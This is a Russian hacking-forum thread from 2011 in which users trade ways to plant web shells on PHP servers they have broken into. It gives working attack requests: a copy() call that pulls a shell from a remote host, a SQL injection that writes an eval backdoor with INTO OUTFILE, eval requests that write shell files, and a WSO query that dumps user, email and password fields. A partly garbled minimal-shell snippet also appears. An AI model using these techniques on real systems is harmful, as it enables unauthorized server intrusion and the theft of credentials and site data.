20.04.2011, 15:59
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 5
С нами:
8738852
Репутация:
0
|
|
Сообщение от Pashkela
Речь, к примеру, идет о ситуации, что вы не знаете куда заливать, или, "куда заливать" просто нет, физически. Или не представляется возможным найти обычными средствами. (таже system легко может быть в списках исключения и тому подобные ситуации). А тут вы просто лазиете и смотрите все сами, сразу, как будто шелл уже залит - и права и возможности и владельцев в
нормальном удобочитаемом виде
.
В логах так или иначе что-то останется, просто при allow_url_fopen=ON шелл заливается за считанные секунды, ну, или, по крайней мере узнается вся структура сервера + читаются все возможные конфиги без особых напрягов.
PS: Т.е. даже если все под рутом и нет ниодной папки на запись - вы все все равно сможете полазить и посмотреть все что нужно, это раз, выполнить php-код любой сложности, не зависящий от длины адресной строки, это два. Закачать прямо с компа полноценный шелл (сплойт) в любую папку, доступную на запись (не из веба) и выполнить его (например, чтобы порутать сервер и залить шелл уже куда угодно и по всем понятиям) - это три. Ну и, наконец, если вообще все под рутом, нет ни одной папки на запись на всем серваке и серв не рутается - вы можете просто слить весь сайт. К себе на комп. Это четыре.
Статья написана именно после того, как сегодня в личке один чел попросил залить шелл, и там как раз вообще все под рутом и нет папок на запись. Однако конфиги и структура таки все поимелись.
Подскажите плиз как посмотреть полную структуру сервера через: ?cmd=
если на сервере allow_url_fopen=ON
Просто не пойму как посмотреть структуру сайтов соседей..
|
|
|
20.04.2011, 16:50
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
а переменная cmd куда передается то?
|
|
|
|
16.08.2011, 21:44
|
|
Познающий
Регистрация: 23.03.2011
Сообщений: 47
С нами:
7968566
Репутация:
0
|
|
Сообщение от BlackSun
Пашко, опять ты всякую фигню народу советуешь =\
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Uploaded!'[/COLOR][COLOR="#007700"]; } }[/COLOR][COLOR="#0000BB"]?>[/COLOR]
[/COLOR]">/bin/bash:
[/COLOR]">pcntl_exec: [/COLOR]" enctype="multipart/form-data">upload: document.getElementById("bash").focus();[COLOR="#0000BB"][/COLOR][/COLOR]
C.P. Mirror: http://pastebin.com/VHprKTvy
Вот. Это самый минимум для нормального минимального шелла. Причем спокойно влезает даже в GET запрос. Ну вот объясните, них понять не могу, вот залил, захожу на *.php и вижу:
Пытаюсь через обзор засунуть шелл, не получается, объясните толково, как работать с этим.
|
|
|
|
19.08.2011, 19:33
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Pashkela
Да-да, абсолютно согласен, просто "статью" написал после примерно 20-40 мессаг в осику, типо "а что делать дальше, если работает ?cmd=phpinfo(); - КАК ЗАЛИТЬ ШЕЛЛ?!?!", ибо достали. Никоим образом этот топик не претендует ни на что, просто чтобы вопросов меньше было. С кодом от BlackSun еще не каждый (кто задает такие вопросы) разберется.
элементарный пример заливки шела через eval для самых ленивых:
Сообщение от None
?cmd=copy("http://site/shell.txt","shell.php");
|
|
|
|
19.08.2011, 20:40
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
С нами:
9576027
Репутация:
173
|
|
Помню на одном сайте нельзя было загружать файлы с других сайтов, то есть функцией copy() и подобными нельзя было залить шелл.
Чудил вот такое:
Код:
http://site.com/script.php?id=-1'+union+select+1,2,'',4,5,6,7,8,9,0,11+INTO+OUTFILE+'/var/www/html/eval.php'/*
Код:
http://site.com/eval.php?c=$ff = fopen("down.html","wt"); fwrite($ff,"shell's text"); fclose($ff);
Код:
http://site.com/eval.php?c=$ff = fopen("dshell.php","wt"); fwrite($ff,''); fclose($ff);
Открываем http://site.com/down.html вводим код шелла, нажимаем отправить.
Открываем http://site.com/sheleng.php там и будет наш шелл.
Мог бы просто написать, что отправляем POST запросом код шелла и сохраняем его в файл, но написал с банальными подробностями, думаю вопросы у некоторых отпадут. |
|
|
|
06.10.2011, 20:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от beerhack
Помню на одном сайте нельзя было загружать файлы с других сайтов, то есть функцией copy() и подобными нельзя было залить шелл.
Чудил вот такое:
Код:
http://site.com/script.php?id=-1'+union+select+1,2,'',4,5,6,7,8,9,0,11+INTO+OUTFILE+'/var/www/html/eval.php'/*
Код:
http://site.com/eval.php?c=$ff = fopen("down.html","wt"); fwrite($ff,"shell's text"); fclose($ff);
Код:
http://site.com/eval.php?c=$ff = fopen("dshell.php","wt"); fwrite($ff,''); fclose($ff);
Открываем http://site.com/down.html вводим код шелла, нажимаем отправить.
Открываем http://site.com/sheleng.php там и будет наш шелл.
Мог бы просто написать, что отправляем POST запросом код шелла и сохраняем его в файл, но написал с банальными подробностями, думаю вопросы у некоторых отпадут. а что тебе мешает залить в /tmp через copy() и просто инклудить оттуда?
|
|
|
|
30.10.2011, 21:17
|
|
Новичок
Регистрация: 05.01.2009
Сообщений: 12
С нами:
9129294
Репутация:
0
|
|
Парни подскажите как с помощью WSO из бд сделать ДАмп определенных полей. и мвозможно ли это сделать ?
|
|
|
|
30.10.2011, 21:23
|
|
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
С нами:
8357366
Репутация:
6
|
|
WSO => Переходим на папку с парвами на записаь => SQL =>
Вводим данные, жмем >>
Выбираем БД, опять жмем >>
Выбираем то, что нужно(ставим галку), жмем dump, все элементарно
|
|
|
|
30.10.2011, 22:32
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от Kuteke
WSO => Переходим на папку с парвами на записаь => SQL =>
Вводим данные, жмем >>
Выбираем БД, опять жмем >>
Выбираем то, что нужно(ставим галку), жмем dump, все элементарно
Ему нужно поля сдампить (столбцы, наверное), а ты ему предлагаешь дампить таблицы.
|
|
|
|
30.10.2011, 22:58
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от mistermar
Парни подскажите как с помощью WSO из бд сделать ДАмп определенных полей. и мвозможно ли это сделать ?
в WSO при подключение к бд появляется консоль, в ней пишем к примеру:
Сообщение от None
select concat_ws(':',user,email,pass) from users into dumpfile '/полный путь до папки разрешонной для запеси/dump.txt'
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
webshell scripts -)
|
blackybr |
PHP |
20 |
28.03.2010 02:17 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
